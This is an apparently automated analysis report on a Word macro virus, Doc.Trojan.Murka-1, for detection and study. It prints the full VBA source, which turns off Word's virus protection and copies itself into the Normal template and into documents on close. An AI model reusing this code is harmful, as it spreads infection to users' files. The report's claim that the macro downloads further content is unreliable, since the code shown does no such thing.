Doc.Trojan.Murka-1 Office (OLE) malware analysis — malicious · d564fa2c557083d8

MALICIOUS

Office (OLE)

29.5 KB Created: 2001-06-21 14:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 08c61ed837a7ed8b4ff9b498d20fd199 SHA-1: 0c69c64104585e03365441a61519eaa2d3b61680 SHA-256: d564fa2c557083d834d14e006f01f88dd37ea1fc09549e952675b8d7cb6dba80

80 Risk Score

Malware Insights

Doc.Trojan.Murka-1 · confidence 90%

MITRE ATT&CK

T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Murka-1. Static analysis revealed VBA macros within the document, specifically within the 'macros.bas' file. The 'Document_Close' subroutine in the VBA code contains comments indicating it's part of the 'Murka' malware, which aims to download and execute further malicious content. The macro execution is triggered when the document is closed.

Heuristics 2

ClamAV: Doc.Trojan.Murka-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Murka-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9070 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9070 bytes
SHA-256: `7579b6d05a165225523c85ad53e119ad20cc0dbae91e0adafa2c2e305110d5c5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() '*********************************************************************** 'Murka - Это самый маленький из всех известных МакроАнтивирусных модулей! 'Принцип действия: Загружается вместе с документом и блокирует ' распространение зараженных модулей ' 'Условия распространения: Freeware(Свободно) 'Достоинства: Корректная работа, надежность! 'Недостатки: Пока не нашел ' '"Все это, конечно, хорошо, но я ни хрена не понял, как его ' можно преобрести?!" - гневно скажешь ты. Можно! 'Дед MustDie вам все раскажет! 'Необходимо лишь открыть документ на персональном 'компе. где уже установлен антивирусный модуль Murka. ' 'Автору: mustdie@chat.ru 'Murke: murka@chat.ru 'Данилову: antivir@dials.ru '********************************************************************* On Error Resume Next Dim s As Boolean Dim i As Long Dim j As Long Dim Murka As String Dim Other As String Dim str As String s = ActiveDocument.Saved Application.EnableCancelKey = wdCancelDisabled With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With str = "Document_Close" With MacroContainer.VBProject.VBComponents.Item(1).CodeModule i = .ProcBodyLine(str, vbext_pk_Proc) j = .ProcCountLines(str, vbext_pk_Proc) Murka = .Lines(i, j) End With With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule i = .ProcBodyLine(str, vbext_pk_Proc) j = .ProcCountLines(str, vbext_pk_Proc) Other = .Lines(i, j) If Other <> Murka And Murka <> "" Then .DeleteLines i, j .InsertLines 1, Murka NormalTemplate.Save End If End With With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule i = .ProcBodyLine(str, vbext_pk_Proc) j = .ProcCountLines(str, vbext_pk_Proc) Other = .Lines(i, j) If Other <> Murka And Murka <> "" Then .DeleteLines i, j .InsertLines 1, Murka Randomize If Rnd < 0.300000007450581 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then Else ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If End If End With If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s End Sub ' Processing file: /opt/analyzer/scan_staging/68cf93e6e5c441e689bccea568151d70.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 5044 bytes ' Line #0: ' FuncDefn (Private Sub Document_Close()) ' Line #1: ' QuoteRem 0x0000 0x0049 "***********************************************************************" ' Line #2: ' QuoteRem 0x0000 0x0048 "Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!" ' Line #3: ' QuoteRem 0x0000 0x003D "Принцип действия: Загружается вместе с документом и блокирует" ' Line #4: ' QuoteRem 0x0000 0x0033 " распространение зараженных модулей" ' Line #5: ' QuoteRem 0x0000 0x0000 "" ' Line #6: ' QuoteRem 0x0000 0x002B "Условия распространения: Freeware(Свободно)" ' Line #7: ' QuoteRem 0x0000 0x0037 "Достоинства: Корректная работа, надежность!" ' Line #8: ' QuoteRem 0x0000 0x0026 "Недостатки: Пока не нашел" ' Line #9: ' QuoteRem 0x0000 0x0000 "" ' Line #10: ' QuoteRem 0x0000 0x003A ""Все это, конечно, хорошо, но я ни хрена не понял, как его" ' Line #11: ' QuoteRem 0x0000 0x0030 " можно преобрести?!" - гневно скажешь ты. Можно!" ' Line #12: ' QuoteRem 0x0000 0x001D "Дед MustDie вам все раскажет!" ' Line #13: ' QuoteRem 0x0000 0x0030 "Необходимо лишь открыть документ на персональном" ' Line #14: ' QuoteRem 0x0000 0x0034 "компе. где уже установлен ант ... (truncated)

SHA-256: 7579b6d05a165225523c85ad53e119ad20cc0dbae91e0adafa2c2e305110d5c5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!
'Принцип действия: Загружается вместе с документом и блокирует
'                 распространение зараженных модулей
'
'Условия распространения: Freeware(Свободно)
'Достоинства:             Корректная работа, надежность!
'Недостатки:              Пока не нашел
'
'"Все это, конечно, хорошо, но я ни хрена не понял, как его
' можно преобрести?!" - гневно скажешь ты. Можно!
'Дед MustDie вам все раскажет!
'Необходимо лишь открыть документ на персональном
'компе. где уже установлен антивирусный модуль Murka.
'
'Автору:   mustdie@chat.ru
'Murke:    murka@chat.ru
'Данилову: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
  s = ActiveDocument.Saved
  Application.EnableCancelKey = wdCancelDisabled
  With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
  str = "Document_Close"
  With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Murka = .Lines(i, j)
  End With
  With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      NormalTemplate.Save
    End If
  End With
  With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      Randomize
      If Rnd < 0.300000007450581 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
      If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then
      Else
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
      End If
    End If
  End With
  If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub


' Processing file: /opt/analyzer/scan_staging/68cf93e6e5c441e689bccea568151d70.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5044 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' 	QuoteRem 0x0000 0x0048 "Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!"
' Line #3:
' 	QuoteRem 0x0000 0x003D "Принцип действия: Загружается вместе с документом и блокирует"
' Line #4:
' 	QuoteRem 0x0000 0x0033 "                 распространение зараженных модулей"
' Line #5:
' 	QuoteRem 0x0000 0x0000 ""
' Line #6:
' 	QuoteRem 0x0000 0x002B "Условия распространения: Freeware(Свободно)"
' Line #7:
' 	QuoteRem 0x0000 0x0037 "Достоинства:             Корректная работа, надежность!"
' Line #8:
' 	QuoteRem 0x0000 0x0026 "Недостатки:              Пока не нашел"
' Line #9:
' 	QuoteRem 0x0000 0x0000 ""
' Line #10:
' 	QuoteRem 0x0000 0x003A ""Все это, конечно, хорошо, но я ни хрена не понял, как его"
' Line #11:
' 	QuoteRem 0x0000 0x0030 " можно преобрести?!" - гневно скажешь ты. Можно!"
' Line #12:
' 	QuoteRem 0x0000 0x001D "Дед MustDie вам все раскажет!"
' Line #13:
' 	QuoteRem 0x0000 0x0030 "Необходимо лишь открыть документ на персональном"
' Line #14:
' 	QuoteRem 0x0000 0x0034 "компе. где уже установлен ант
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.